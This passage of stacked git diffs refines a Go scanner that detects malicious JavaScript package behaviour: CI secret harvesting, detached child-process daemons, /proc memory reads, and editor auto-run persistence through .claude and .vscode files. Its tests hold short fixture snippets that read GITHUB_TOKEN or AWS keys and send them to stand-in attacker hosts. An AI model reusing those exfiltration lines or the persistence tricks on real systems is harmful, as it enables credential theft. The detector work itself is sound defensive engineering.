+		window := content[procStart:windowEnd]
+		if bytes.Contains(window, []byte("/mem")) ||
+			bytes.Contains(window, []byte("/maps")) ||
+			bytes.Contains(window, []byte("cmdline")) {
+			return lineOf(content, procStart)
+		}
+		off = procStart + len("/proc/")
+	}
+	return 0
 }
 
 // --- needle lists ---

--- a/internal/engine/jsrisk/jsrisk.go
+++ b/internal/engine/jsrisk/jsrisk.go
@@ -319,17 +319,35 @@ func lineOf(content []byte, idx int) int {
 	return bytes.Count(content[:idx], []byte{'\n'}) + 1
 }
 
-// procMemPairWindow bounds how far a memory-like subpath can be from a
-// /proc/ occurrence before they stop counting as part of the same
-// access. 200 bytes is generous for any plausible source form
-// (`/proc/' + pid + '/mem'`, template literals, multi-arg function
+// procMemPairWindow bounds how far a quote-wrapped memory subpath can
+// be from a /proc/ occurrence before they stop counting as part of the
+// same access. 200 bytes is generous for any plausible source form
+// (`'/proc/' + pid + '/mem'`, template literals, multi-arg function
 // calls) without spanning unrelated identifiers.
 const procMemPairWindow = 200
 
-// findProcMemPair returns the 1-based line of the first /proc/
-// occurrence followed within procMemPairWindow bytes by /mem, /maps,
-// or cmdline. Returns 0 when no such pair exists.
+// procMemLiteralRe matches a literal path: /proc/<pid-or-self>/<sub>
+// where <sub> is mem, maps, or cmdline and is followed by a word
+// boundary. Root-level files like /proc/meminfo and /proc/cmdline
+// (which is the kernel boot args file, not per-process) do not match
+// because they lack the intervening pid segment.
+var procMemLiteralRe = regexp.MustCompile(`/proc/(?:[0-9]+|self|thread-self)/(mem|maps|cmdline)\b`)
+
+// procMemDynamicSubRe matches the quote-wrapped subpath token used by
+// dynamic forms: `'/mem'`, `"/maps"`, `` `/cmdline` ``, and the
+// template-interpolation closing form `}/mem`. The leading set
+// includes `}` so template literals (`/proc/${pid}/mem`) match.
+var procMemDynamicSubRe = regexp.MustCompile("[}'\"\x60]/(mem|maps|cmdline)['\"\x60}]")
+
+// findProcMemPair returns the 1-based line of the first /proc/ access
+// that targets a memory-like subpath: either a literal
+// /proc/<pid>/<sub> match, or a /proc/ occurrence followed within
+// procMemPairWindow bytes by a quote-wrapped subpath token (the form
+// dynamic concat and template literals leave in source).
 func findProcMemPair(content []byte) int {
+	if loc := procMemLiteralRe.FindIndex(content); loc != nil {
+		return lineOf(content, loc[0])
+	}
 	off := 0
 	for off < len(content) {
 		i := bytes.Index(content[off:], []byte("/proc/"))
@@ -341,10 +359,7 @@ func findProcMemPair(content []byte) int {
 		if windowEnd > len(content) {
 			windowEnd = len(content)
 		}
-		window := content[procStart:windowEnd]
-		if bytes.Contains(window, []byte("/mem")) ||
-			bytes.Contains(window, []byte("/maps")) ||
-			bytes.Contains(window, []byte("cmdline")) {
+		if procMemDynamicSubRe.Match(content[procStart:windowEnd]) {
 			return lineOf(content, procStart)
 		}
 		off = procStart + len("/proc/")

--- a/internal/engine/jsrisk/jsrisk.go
+++ b/internal/engine/jsrisk/jsrisk.go
@@ -107,6 +107,12 @@ var dispatcherCallRe = regexp.MustCompile(`_0x[0-9a-fA-F]{2,}\s*\(`)
 // chain entirely.
 var detachedTrueRe = regexp.MustCompile(`(?i)["']?detached["']?\s*:\s*true\b`)
 
+// stdioIgnoredRe matches `stdio: 'ignore'` / `stdio: "ignore"` /
+// `"stdio": "ignore"` and the array forms (`stdio: ['ignore', ...]`,
+// `"stdio": ['ignore'`). Without quote tolerance the JSON-style spawn
+// options bypass the daemon-shape check.
+var stdioIgnoredRe = regexp.MustCompile(`(?i)["']?stdio["']?\s*:\s*(?:['"]ignore['"]|\[\s*['"]ignore['"])`)
+
 
 // --- metrics ---
 
@@ -260,12 +266,7 @@ func computeMetrics(content []byte) *metrics {
 		m.HasSpawnDetached = true
 		m.LineDaemon = lineOf(content, loc[0])
 	}
-	if bytes.Contains(content, []byte(`stdio: 'ignore'`)) ||
-		bytes.Contains(content, []byte(`stdio: "ignore"`)) ||
-		bytes.Contains(content, []byte(`stdio:'ignore'`)) ||
-		bytes.Contains(content, []byte(`stdio:"ignore"`)) ||
-		bytes.Contains(content, []byte(`stdio: ['ignore'`)) ||
-		bytes.Contains(content, []byte(`stdio:['ignore'`)) {
+	if stdioIgnoredRe.Match(content) {
 		m.HasStdioIgnored = true
 	}
 	m.HasUnref = bytes.Contains(content, []byte(".unref()"))
@@ -335,6 +336,17 @@ var networkSinkNeedles = []string{
 	"got.get",
 	"http.request",
 	"https.request",
+	// Node inline forms: require('https').request(...) and the node:
+	// scheme variant. Both are common in compact exfil payloads where
+	// the module is never bound to a local variable.
+	"require('https').request",
+	`require("https").request`,
+	"require('http').request",
+	`require("http").request`,
+	"require('node:https').request",
+	`require("node:https").request`,
+	"require('node:http').request",
+	`require("node:http").request`,
 	"net.connect",
 	"net.createconnection",
 	"xmlhttprequest",

--- a/internal/engine/jsrisk/jsrisk.go
+++ b/internal/engine/jsrisk/jsrisk.go
@@ -397,17 +397,17 @@ func collectChildProcessCalls(content []byte) []cpCallSite {
 		aliases[string(content[m[2]:m[3]])] = true
 	}
 	if len(aliases) > 0 {
-		// Compile one alternation per scan so the receiver match is
-		// scoped exactly to the names that were imported.
-		var parts []string
-		for name := range aliases {
-			parts = append(parts, regexp.QuoteMeta(name))
-		}
-		aliasRe := regexp.MustCompile(
-			`\b(?:` + strings.Join(parts, "|") + `)\s*\.\s*(?:spawn|spawnSync|fork|exec|execSync|execFile|execFileSync)\s*\(`,
-		)
-		for _, loc := range aliasRe.FindAllIndex(content, -1) {
-			sites = append(sites, cpCallSite{Start: loc[0], ArgsStart: loc[1]})
+		// Generic identifier-method matcher; filter to imported names.
+		// jsIdentBoundary handles `$`-prefixed aliases that a literal
+		// `\b` would skip.
+		for _, m := range identifierCPMethodCallRe.FindAllSubmatchIndex(content, -1) {
+			if aliases[string(content[m[2]:m[3]])] {
+				// Submatch 0 spans the boundary char + alias + .method(.
+				// The actual identifier starts at m[2]; that is the
+				// anchor we want for the finding's Line. ArgsStart is
+				// m[1] (one past the opening paren).
+				sites = append(sites, cpCallSite{Start: m[2], ArgsStart: m[1]})
+			}
 		}
 	}
 
@@ -477,16 +477,10 @@ func findNetworkAliasSink(content []byte) int {
 	if len(aliases) == 0 {
 		return 0
 	}
-	var nameParts []string
-	for n := range aliases {
-		nameParts = append(nameParts, regexp.QuoteMeta(n))
-	}
-	methodPart := strings.Join(httpAliasMethods, "|")
-	re := regexp.MustCompile(
-		`\b(?:` + strings.Join(nameParts, "|") + `)\s*\.\s*(?:` + methodPart + `)\s*\(`,
-	)
-	if loc := re.FindIndex(content); loc != nil {
-		return lineOf(content, loc[0])
+	for _, m := range identifierHTTPMethodCallRe.FindAllSubmatchIndex(content, -1) {
+		if aliases[string(content[m[2]:m[3]])] {
+			return lineOf(content, m[2])
+		}
 	}
 	return 0
 }
@@ -631,10 +625,38 @@ var cpMethodNames = map[string]bool{
 	"execFile": true, "execFileSync": true,
 }
 
-// envReadRe captures direct env-variable reads:
-// `process.env.<NAME>`, `process.env['<NAME>']`, or
-// `process.env["<NAME>"]`.
-var envReadRe = regexp.MustCompile(`process\.env\s*(?:\.|\[\s*['"])([A-Z][A-Z0-9_]+)`)
+// identifierCPMethodCallRe captures `<identifier>.<cp-method>(` for
+// any JS identifier, including ones beginning with `$`. The caller
+// filters submatch 1 (the identifier) through the discovered alias
+// set so unrelated objects do not satisfy the receiver match.
+var identifierCPMethodCallRe = regexp.MustCompile(
+	jsIdentBoundary + `([A-Za-z_$][\w$]*)\s*\.\s*(?:spawn|spawnSync|fork|exec|execSync|execFile|execFileSync)\s*\(`,
+)
+
+// identifierHTTPMethodCallRe captures `<identifier>.<method>(` for
+// the http / https / net family. Caller filters submatch 1 through
+// the discovered alias set.
+var identifierHTTPMethodCallRe = regexp.MustCompile(
+	jsIdentBoundary + `([A-Za-z_$][\w$]*)\s*\.\s*(?:request|get|post|put|connect|createConnection)\s*\(`,
+)
+
+// envReadRe captures direct env-variable reads in all the forms a
+// real payload uses:
+//
+//	process.env.NAME
+//	process.env?.NAME           (optional chaining)
+//	process.env['NAME']         (string key)
+//	process.env["NAME"]
+//	process.env[`NAME`]         (template-literal key)
+var envReadRe = regexp.MustCompile("process\\.env\\s*(?:\\??\\.|\\[\\s*['\"\x60])([A-Z][A-Z0-9_]+)")
+
+// jsIdentBoundary is the leading-context fragment used for runtime
+// alias regexes. JavaScript identifiers include `$`, so a literal
+// regex `\b` does not establish a boundary before `$cp` (`$` is
+// non-word in RE2's `\b` definition). Matching an explicit
+// non-identifier character (or start-of-input) captures the
+// boundary without requiring a lookbehind.
+const jsIdentBoundary = `(?:^|[^A-Za-z0-9_$.])`
 
 // envDestructureRe captures destructured env reads with or without
 // aliases:
@@ -723,11 +745,6 @@ var httpModuleAliasESMRe = regexp.MustCompile(
 	`import\s+(?:\*\s+as\s+)?([A-Za-z_$][\w$]*)\s+from\s*['"](?:node:)?(?:http|https|net)['"]`,
 )
 
-// httpAliasMethods is the set of methods that count as a network sink
-// when invoked on an aliased http / https / net module: an attacker
-// calling `h.request(...)` against an imported https alias is the
-// classic compact-exfil shape.
-var httpAliasMethods = []string{"request", "get", "post", "put", "connect", "createConnection"}
 
 var publishSinkNeedles = []string{
 	"registry.npmjs.org",

--- a/internal/engine/jsrisk/jsrisk.go
+++ b/internal/engine/jsrisk/jsrisk.go
@@ -245,16 +245,37 @@ func computeMetrics(content []byte) *metrics {
 			m.HasSessionSink = true
 		}
 	}
-	m.HasChildProcess = bytes.Contains(lower, []byte("child_process")) ||
-		bytes.Contains(lower, []byte("require('child_process')")) ||
-		bytes.Contains(lower, []byte(`require("child_process")`))
+	// HasChildProcess requires an actual invocation, not just an import.
+	// A bare `require('child_process')` or `import cp from 'child_process'`
+	// is not enough; the script must call spawn / fork / exec / execFile
+	// (sync or async) for the daemon chain to apply.
+	m.HasChildProcess = childProcessInvokeRe.Match(content)
 	m.HasProcessEnv = bytes.Contains(lower, []byte("process.env"))
 
-	// CI / cloud secret reads. The list is short and unambiguous; each
-	// entry is either an env var name (uppercase / underscored, so it
-	// will not appear as a registry package name) or a well-known cloud
-	// metadata IP / path.
-	for _, n := range ciSecretReadNeedles {
+	// CI / cloud secret reads. An env var name is only a real read when
+	// it appears as `process.env.<NAME>` (or the bracket form). Pure
+	// string mentions of the name (documentation, error messages, env
+	// var names in unrelated arrays) do not count as a read.
+	for _, match := range envReadRe.FindAllSubmatchIndex(content, -1) {
+		name := string(content[match[2]:match[3]])
+		for _, n := range ciSecretEnvVars {
+			if name == n {
+				m.HasCISecretRead = true
+				if m.LineCISecret == 0 {
+					m.LineCISecret = lineOf(content, match[0])
+					m.CISecretMatched = n
+				}
+				break
+			}
+		}
+		if m.HasCISecretRead {
+			break
+		}
+	}
+	// Cloud metadata endpoints and on-disk credential paths are
+	// identified by literal-string presence; they are unambiguous IPs /
+	// filesystem paths that do not appear as env var names.
+	for _, n := range ciSecretLiteralNeedles {
 		if i := bytes.Index(content, []byte(n)); i >= 0 {
 			m.HasCISecretRead = true
 			if m.LineCISecret == 0 {
@@ -332,6 +353,21 @@ const procMemPairWindow = 200
 // (which is the kernel boot args file, not per-process) do not match
 // because they lack the intervening pid segment.
 var procMemLiteralRe = regexp.MustCompile(`/proc/(?:[0-9]+|self|thread-self)/(mem|maps|cmdline)\b`)
+
+// childProcessInvokeRe matches an actual child_process invocation
+// (spawn, spawnSync, fork, exec, execSync, execFile, execFileSync).
+// This is stricter than checking for the bare `child_process` import,
+// because a script can import the module without ever calling it and
+// daemon-option literals elsewhere in the file should not chain on
+// import alone.
+var childProcessInvokeRe = regexp.MustCompile(`\.(?:spawn|spawnSync|fork|exec|execSync|execFile|execFileSync)\s*\(`)
+
+// envReadRe captures real env-variable reads: `process.env.<NAME>`,
+// `process.env['<NAME>']`, or `process.env["<NAME>"]`. A string that
+// merely names an env var (a documentation message, a UI label, an
+// error string) does not satisfy this and so does not satisfy the
+// secret-harvest chain on its own.
+var envReadRe = regexp.MustCompile(`process\.env\s*(?:\.|\[\s*['"])([A-Z][A-Z0-9_]+)`)
 
 // procMemDynamicSubRe matches the quote-wrapped subpath token used by
 // dynamic forms: `'/mem'`, `"/maps"`, `` `/cmdline` ``, and the
@@ -419,9 +455,10 @@ var sessionSinkNeedles = []string{
 	"seed3.getsession.org",
 }
 
-// ciSecretReadNeedles are case-sensitive on purpose: GHA / cloud envs
-// are uppercase and would not appear as part of a dependency name.
-var ciSecretReadNeedles = []string{
+// ciSecretEnvVars are GHA / cloud env var names whose value is the
+// secret. A real read goes through process.env (see envReadRe); the
+// bare string is not enough on its own.
+var ciSecretEnvVars = []string{
 	"GITHUB_TOKEN",
 	"ACTIONS_ID_TOKEN_REQUEST_TOKEN",
 	"ACTIONS_ID_TOKEN_REQUEST_URL",
@@ -431,20 +468,34 @@ var ciSecretReadNeedles = []string{
 	"AWS_WEB_IDENTITY_TOKEN_FILE",
 	"VAULT_TOKEN",
 	"KUBERNETES_SERVICE_HOST",
+}
+
+// ciSecretLiteralNeedles are cloud-metadata IPs and on-disk credential
+// paths. These are unambiguous strings; their literal presence in a
+// JavaScript file is sufficient evidence of secret access.
+var ciSecretLiteralNeedles = []string{
 	"/var/run/secrets/kubernetes.io/serviceaccount",
 	"169.254.169.254",
 	"169.254.170.2",
 }
 
+// agentPersistenceNeedles are paths or config tokens that cause an
+// editor to auto-execute code on workspace open. .vscode/tasks.json is
+// intentionally excluded: VS Code only auto-runs a task when its
+// runOptions.runOn is folderOpen, and that condition is captured
+// separately by the runOn needles below. A package that merely writes
+// a manually-runnable .vscode/tasks.json is not by itself persistence.
 var agentPersistenceNeedles = []string{
 	".claude/settings.json",
 	".claude/router_runtime.js",
 	".claude/setup.mjs",
 	".claude/hooks/",
-	".vscode/tasks.json",
 	".vscode/setup.mjs",
 	`runOn": "folderOpen`,
 	`runOn":"folderOpen`,
+	`runOn: "folderOpen`,
+	`runOn: 'folderOpen`,
+	`runOn:'folderOpen`,
 }
 
 // --- detection ---

--- a/internal/engine/jsrisk/jsrisk.go
+++ b/internal/engine/jsrisk/jsrisk.go
@@ -338,14 +338,11 @@ func computeMetrics(content []byte) *metrics {
 		}
 	}
 	if bytes.Contains(content, []byte(".vscode/tasks.json")) {
-		for _, n := range runOnFolderOpenNeedles {
-			if i := bytes.Index(content, []byte(n)); i >= 0 {
-				m.HasVSCodePersistence = true
-				if m.LineAgentPath == 0 {
-					m.LineAgentPath = lineOf(content, i)
-					m.AgentPathMatched = ".vscode/tasks.json + " + n
-				}
-				break
+		if loc := runOnFolderOpenRe.FindIndex(content); loc != nil {
+			m.HasVSCodePersistence = true
+			if m.LineAgentPath == 0 {
+				m.LineAgentPath = lineOf(content, loc[0])
+				m.AgentPathMatched = ".vscode/tasks.json + runOn: folderOpen"
 			}
 		}
 	}
@@ -378,9 +375,37 @@ type cpCallSite struct {
 // name was never imported from the module are excluded.
 func collectChildProcessCalls(content []byte) []cpCallSite {
 	var sites []cpCallSite
-	for _, loc := range childProcessReceiverRe.FindAllIndex(content, -1) {
+
+	// Inline require chain: require('child_process').spawn(...)
+	for _, loc := range inlineRequireReceiverRe.FindAllIndex(content, -1) {
 		sites = append(sites, cpCallSite{Start: loc[0], ArgsStart: loc[1]})
 	}
+
+	// Aliases bound via CJS require or ESM default/namespace import.
+	// Only names that are ACTUALLY bound from child_process count as
+	// receivers; an unrelated local variable called `cp` does not.
+	aliases := map[string]bool{}
+	for _, m := range childProcessAliasAssignRe.FindAllSubmatchIndex(content, -1) {
+		aliases[string(content[m[2]:m[3]])] = true
+	}
+	for _, m := range childProcessAliasESMRe.FindAllSubmatchIndex(content, -1) {
+		aliases[string(content[m[2]:m[3]])] = true
+	}
+	if len(aliases) > 0 {
+		// Compile one alternation per scan so the receiver match is
+		// scoped exactly to the names that were imported.
+		var parts []string
+		for name := range aliases {
+			parts = append(parts, regexp.QuoteMeta(name))
+		}
+		aliasRe := regexp.MustCompile(
+			`\b(?:` + strings.Join(parts, "|") + `)\s*\.\s*(?:spawn|spawnSync|fork|exec|execSync|execFile|execFileSync)\s*\(`,
+		)
+		for _, loc := range aliasRe.FindAllIndex(content, -1) {
+			sites = append(sites, cpCallSite{Start: loc[0], ArgsStart: loc[1]})
+		}
+	}
+
 	// Collect destructured local names. For each entry the source
 	// (left of `:` in CJS, left of ` as ` in ESM) must be a real
 	// child_process method; the local binding (right side, or the
@@ -504,17 +529,36 @@ const procMemPairWindow = 200
 // because they lack the intervening pid segment.
 var procMemLiteralRe = regexp.MustCompile(`/proc/(?:[0-9]+|self|thread-self)/(mem|maps|cmdline)\b`)
 
-// childProcessReceiverRe matches a child_process method call whose
-// receiver is either an inline require chain or a conventional alias
-// for the imported module. Restricting to these receivers prevents
-// `worker.spawn(...)` on an unrelated object from satisfying the
-// daemon chain just because `child_process` appears elsewhere in the
-// file. The conventional aliases (cp, childProcess, child_process,
-// ChildProcess) cover the bindings real-world code uses; obscure
-// renames are intentionally out of reach without AST parsing.
-var childProcessReceiverRe = regexp.MustCompile(
-	`(?:require\s*\(\s*['"](?:node:)?child_process['"]\s*\)|\b(?:cp|childProcess|child_process|ChildProcess|_cp)\b)` +
+// inlineRequireReceiverRe matches a child_process method call whose
+// receiver is the inline require chain itself, so the binding is
+// unambiguous. Aliases bound via `const cp = require(...)` are
+// discovered dynamically (see collectChildProcessAliases) and
+// matched separately.
+var inlineRequireReceiverRe = regexp.MustCompile(
+	`require\s*\(\s*['"](?:node:)?child_process['"]\s*\)` +
 		`\s*\.\s*(?:spawn|spawnSync|fork|exec|execSync|execFile|execFileSync)\s*\(`,
+)
+
+// childProcessAliasAssignRe captures the local variable that gets
+// bound to the imported child_process module via require:
+//
+//	const cp = require('child_process')
+//	let _cp = require("node:child_process")
+//
+// Submatch 1 is the local name.
+var childProcessAliasAssignRe = regexp.MustCompile(
+	`(?:const|let|var)\s+([A-Za-z_$][\w$]*)\s*=\s*require\s*\(\s*['"](?:node:)?child_process['"]\s*\)`,
+)
+
+// childProcessAliasESMRe captures the local variable bound via an
+// ESM default or namespace import:
+//
+//	import cp from 'child_process'
+//	import * as cp from 'node:child_process'
+//
+// Submatch 1 is the local name.
+var childProcessAliasESMRe = regexp.MustCompile(
+	`import\s+(?:\*\s+as\s+)?([A-Za-z_$][\w$]*)\s+from\s*['"](?:node:)?child_process['"]`,
 )
 
 // anyBareInvokeRe captures the name and call site of any bare
@@ -684,17 +728,13 @@ var agentPersistenceNeedles = []string{
 	".vscode/setup.mjs",
 }
 
-// runOnFolderOpenNeedles capture the VS Code task trigger that turns
-// a tasks.json entry into an auto-run on workspace open. These do not
-// fire on their own; persistence requires the file ALSO references
-// .vscode/tasks.json (see detection below).
-var runOnFolderOpenNeedles = []string{
-	`runOn": "folderOpen`,
-	`runOn":"folderOpen`,
-	`runOn: "folderOpen`,
-	`runOn: 'folderOpen`,
-	`runOn:'folderOpen`,
-}
+// runOnFolderOpenRe captures the VS Code task trigger that turns a
+// tasks.json entry into an auto-run on workspace open. Tolerates
+// optional quotes around the key (`'runOn'`, `"runOn"`, bare runOn),
+// whitespace, and either quote style around the `folderOpen` value.
+// Persistence requires the file ALSO references .vscode/tasks.json
+// (see detection below); this token does not fire on its own.
+var runOnFolderOpenRe = regexp.MustCompile(`(?i)["']?runOn["']?\s*:\s*["']folderOpen["']`)
 
 // --- detection ---
 

--- a/internal/engine/jsrisk/jsrisk.go
+++ b/internal/engine/jsrisk/jsrisk.go
@@ -245,31 +245,50 @@ func computeMetrics(content []byte) *metrics {
 			m.HasSessionSink = true
 		}
 	}
-	// HasChildProcess requires an actual invocation, not just an import.
-	// A bare `require('child_process')` or `import cp from 'child_process'`
-	// is not enough; the script must call spawn / fork / exec / execFile
-	// (sync or async) for the daemon chain to apply.
-	m.HasChildProcess = childProcessInvokeRe.Match(content)
+	// HasChildProcess requires both a child_process module reference AND
+	// a real invocation. Without the module gate `worker.spawn(...)` on
+	// an unrelated object would falsely match; without the invocation
+	// gate a bare import would suffice. The bare-form regex covers
+	// destructured imports (`const { spawn } = require('child_process')`)
+	// and the method-form regex covers `cp.spawn(...)`.
+	m.HasChildProcess = bytes.Contains(content, []byte("child_process")) &&
+		(childProcessMethodInvokeRe.Match(content) ||
+			childProcessBareInvokeRe.Match(content))
 	m.HasProcessEnv = bytes.Contains(lower, []byte("process.env"))
 
-	// CI / cloud secret reads. An env var name is only a real read when
-	// it appears as `process.env.<NAME>` (or the bracket form). Pure
-	// string mentions of the name (documentation, error messages, env
-	// var names in unrelated arrays) do not count as a read.
-	for _, match := range envReadRe.FindAllSubmatchIndex(content, -1) {
-		name := string(content[match[2]:match[3]])
+	// CI / cloud secret reads come in three forms: direct member access
+	// (process.env.NAME), bracket access (process.env['NAME']), and
+	// destructuring ({NAME} = process.env). Pure string mentions do not
+	// count as a read.
+	checkSecretName := func(name string, idx int) {
 		for _, n := range ciSecretEnvVars {
-			if name == n {
+			if name == n && !m.HasCISecretRead {
 				m.HasCISecretRead = true
-				if m.LineCISecret == 0 {
-					m.LineCISecret = lineOf(content, match[0])
-					m.CISecretMatched = n
-				}
-				break
+				m.LineCISecret = lineOf(content, idx)
+				m.CISecretMatched = n
+				return
 			}
 		}
+	}
+	for _, match := range envReadRe.FindAllSubmatchIndex(content, -1) {
 		if m.HasCISecretRead {
 			break
+		}
+		checkSecretName(string(content[match[2]:match[3]]), match[0])
+	}
+	if !m.HasCISecretRead {
+		for _, match := range envDestructureRe.FindAllSubmatchIndex(content, -1) {
+			if m.HasCISecretRead {
+				break
+			}
+			nameList := string(content[match[2]:match[3]])
+			for _, raw := range strings.Split(nameList, ",") {
+				name := strings.TrimSpace(raw)
+				checkSecretName(name, match[0])
+				if m.HasCISecretRead {
+					break
+				}
+			}
 		}
 	}
 	// Cloud metadata endpoints and on-disk credential paths are
@@ -309,22 +328,32 @@ func computeMetrics(content []byte) *metrics {
 		bytes.Contains(content, []byte("ACTIONS_ID_TOKEN_REQUEST_URL"))
 	m.HasRunnerWorker = bytes.Contains(content, []byte("Runner.Worker"))
 
-	// Agent persistence references. Each path is a known incident
-	// fingerprint root; the analyzer keeps the first match as the
-	// anchor line.
+	// Agent persistence references. Path-only needles fire on their
+	// own; the runOn:folderOpen token only counts as persistence when
+	// the file also references .vscode/tasks.json (manually-runnable
+	// tasks files alone are not persistence).
 	for _, n := range agentPersistenceNeedles {
 		if i := bytes.Index(content, []byte(n)); i >= 0 {
-			switch {
-			case strings.HasPrefix(n, ".claude/"):
+			if strings.HasPrefix(n, ".claude/") {
 				m.HasClaudePersistence = true
-			case strings.HasPrefix(n, ".vscode/"):
+			} else {
 				m.HasVSCodePersistence = true
-			default:
-				m.HasClaudePersistence = true
 			}
 			if m.LineAgentPath == 0 {
 				m.LineAgentPath = lineOf(content, i)
 				m.AgentPathMatched = n
+			}
+		}
+	}
+	if bytes.Contains(content, []byte(".vscode/tasks.json")) {
+		for _, n := range runOnFolderOpenNeedles {
+			if i := bytes.Index(content, []byte(n)); i >= 0 {
+				m.HasVSCodePersistence = true
+				if m.LineAgentPath == 0 {
+					m.LineAgentPath = lineOf(content, i)
+					m.AgentPathMatched = ".vscode/tasks.json + " + n
+				}
+				break
 			}
 		}
 	}
@@ -354,20 +383,29 @@ const procMemPairWindow = 200
 // because they lack the intervening pid segment.
 var procMemLiteralRe = regexp.MustCompile(`/proc/(?:[0-9]+|self|thread-self)/(mem|maps|cmdline)\b`)
 
-// childProcessInvokeRe matches an actual child_process invocation
-// (spawn, spawnSync, fork, exec, execSync, execFile, execFileSync).
-// This is stricter than checking for the bare `child_process` import,
-// because a script can import the module without ever calling it and
-// daemon-option literals elsewhere in the file should not chain on
-// import alone.
-var childProcessInvokeRe = regexp.MustCompile(`\.(?:spawn|spawnSync|fork|exec|execSync|execFile|execFileSync)\s*\(`)
+// childProcessMethodInvokeRe matches a child_process method call:
+// `cp.spawn(...)`, `child_process.fork(...)`, etc. The leading `.`
+// ensures the name is a method, not an unrelated function.
+var childProcessMethodInvokeRe = regexp.MustCompile(`\.(?:spawn|spawnSync|fork|exec|execSync|execFile|execFileSync)\s*\(`)
 
-// envReadRe captures real env-variable reads: `process.env.<NAME>`,
-// `process.env['<NAME>']`, or `process.env["<NAME>"]`. A string that
-// merely names an env var (a documentation message, a UI label, an
-// error string) does not satisfy this and so does not satisfy the
-// secret-harvest chain on its own.
+// childProcessBareInvokeRe matches a bare invocation: `spawn(...)`,
+// `fork(...)`, `exec(...)`, etc., used after `const { spawn } =
+// require('child_process')`. Word boundary on the left avoids
+// matching `myspawn(`. The bare form is only treated as a child
+// process invocation when the file also references child_process
+// (see hasChildProcess gating below).
+var childProcessBareInvokeRe = regexp.MustCompile(`\b(?:spawn|spawnSync|fork|exec|execSync|execFile|execFileSync)\s*\(`)
+
+// envReadRe captures direct env-variable reads:
+// `process.env.<NAME>`, `process.env['<NAME>']`, or
+// `process.env["<NAME>"]`.
 var envReadRe = regexp.MustCompile(`process\.env\s*(?:\.|\[\s*['"])([A-Z][A-Z0-9_]+)`)
+
+// envDestructureRe captures destructured env reads:
+// `const { GITHUB_TOKEN } = process.env`,
+// `const { FOO, BAR } = process.env`. Submatch 1 is the comma-
+// separated name list; callers split it and check each name.
+var envDestructureRe = regexp.MustCompile(`\{\s*([A-Z][A-Z0-9_]+(?:\s*,\s*[A-Z][A-Z0-9_]+)*)\s*\}\s*=\s*process\.env\b`)
 
 // procMemDynamicSubRe matches the quote-wrapped subpath token used by
 // dynamic forms: `'/mem'`, `"/maps"`, `` `/cmdline` ``, and the
@@ -479,18 +517,23 @@ var ciSecretLiteralNeedles = []string{
 	"169.254.170.2",
 }
 
-// agentPersistenceNeedles are paths or config tokens that cause an
-// editor to auto-execute code on workspace open. .vscode/tasks.json is
-// intentionally excluded: VS Code only auto-runs a task when its
-// runOptions.runOn is folderOpen, and that condition is captured
-// separately by the runOn needles below. A package that merely writes
-// a manually-runnable .vscode/tasks.json is not by itself persistence.
+// agentPersistenceNeedles are paths whose presence alone is sufficient
+// evidence of editor-automation persistence. Each names a file that
+// either holds auto-running config (.claude/settings.json hooks) or is
+// itself auto-executed (.vscode/setup.mjs) on workspace open.
 var agentPersistenceNeedles = []string{
 	".claude/settings.json",
 	".claude/router_runtime.js",
 	".claude/setup.mjs",
 	".claude/hooks/",
 	".vscode/setup.mjs",
+}
+
+// runOnFolderOpenNeedles capture the VS Code task trigger that turns
+// a tasks.json entry into an auto-run on workspace open. These do not
+// fire on their own; persistence requires the file ALSO references
+// .vscode/tasks.json (see detection below).
+var runOnFolderOpenNeedles = []string{
 	`runOn": "folderOpen`,
 	`runOn":"folderOpen`,
 	`runOn: "folderOpen`,

--- a/internal/engine/jsrisk/jsrisk_test.go
+++ b/internal/engine/jsrisk/jsrisk_test.go
@@ -331,6 +331,57 @@ require('fs').writeFileSync(process.env.HOME + '/.claude/settings.json', '{}');
 	}
 }
 
+// --- pass-7 fixes: daemon proximity, aliased destructure, whitespace in network ---
+
+func TestSafe_DaemonOptionsFarFromSpawn(t *testing.T) {
+	// Daemon-shape options 600 bytes away from a child_process call
+	// fall outside the proximity window and must not chain.
+	padding := strings.Repeat("// padding line padding line padding line padding line\n", 12)
+	body := `
+const cp = require('child_process');
+cp.spawn('echo', ['hello']);
+` + padding + `
+const helperConfig = { detached: true, stdio: 'ignore' };
+`
+	findings := analyze(t, "fp.js", body)
+	if hasRule(findings, RuleDaemon) {
+		t.Errorf("daemon options outside proximity window must not chain, got: %+v", findings)
+	}
+}
+
+func TestVuln_AliasedDestructureSecretRead(t *testing.T) {
+	body := `
+const { GITHUB_TOKEN: t } = process.env;
+fetch('https://attacker/x', {method:'POST', body:t});
+`
+	findings := analyze(t, "al.js", body)
+	if !hasRule(findings, RuleCISecretHarvest) {
+		t.Errorf("aliased destructured env read must chain harvest, got: %+v", findings)
+	}
+}
+
+func TestVuln_MixedAliasedAndPlainDestructure(t *testing.T) {
+	body := `
+const { FOO, GITHUB_TOKEN: t, BAR: b } = process.env;
+fetch('https://attacker/x', {body: t});
+`
+	findings := analyze(t, "mx.js", body)
+	if !hasRule(findings, RuleCISecretHarvest) {
+		t.Errorf("mixed aliased/plain destructure must still pick CI secret, got: %+v", findings)
+	}
+}
+
+func TestVuln_NetworkSinkWhitespaceBeforeParen(t *testing.T) {
+	body := `
+const t = process.env.GITHUB_TOKEN;
+fetch ('https://attacker/x', {method:'POST', body: t});
+`
+	findings := analyze(t, "ws.js", body)
+	if !hasRule(findings, RuleCISecretHarvest) {
+		t.Errorf("fetch with whitespace before ( must chain harvest, got: %+v", findings)
+	}
+}
+
 // --- pass-6 fixes: child-process module gate, destructured env reads, runOn context ---
 
 func TestSafe_UnrelatedWorkerSpawnMethod(t *testing.T) {

--- a/internal/engine/jsrisk/jsrisk_test.go
+++ b/internal/engine/jsrisk/jsrisk_test.go
@@ -331,6 +331,59 @@ require('fs').writeFileSync(process.env.HOME + '/.claude/settings.json', '{}');
 	}
 }
 
+// --- pass-11 fixes: HTTP module aliases, .vscode/setup.mjs gating ---
+
+func TestVuln_HttpsAliasRequestSink(t *testing.T) {
+	body := `
+const h = require('https');
+const t = process.env.GITHUB_TOKEN;
+h.request({hostname:'attacker.example', method:'POST'}).end(t);
+`
+	findings := analyze(t, "ha.js", body)
+	if !hasRule(findings, RuleCISecretHarvest) {
+		t.Errorf("aliased https.request must chain harvest, got: %+v", findings)
+	}
+}
+
+func TestVuln_ESMNetAliasSink(t *testing.T) {
+	body := `
+import net from 'node:net';
+const t = process.env.AWS_SECRET_ACCESS_KEY;
+net.connect({port:1234, host:'attacker'}).write(t);
+`
+	findings := analyze(t, "na.mjs", body)
+	if !hasRule(findings, RuleCISecretHarvest) {
+		t.Errorf("ESM net alias must chain harvest, got: %+v", findings)
+	}
+}
+
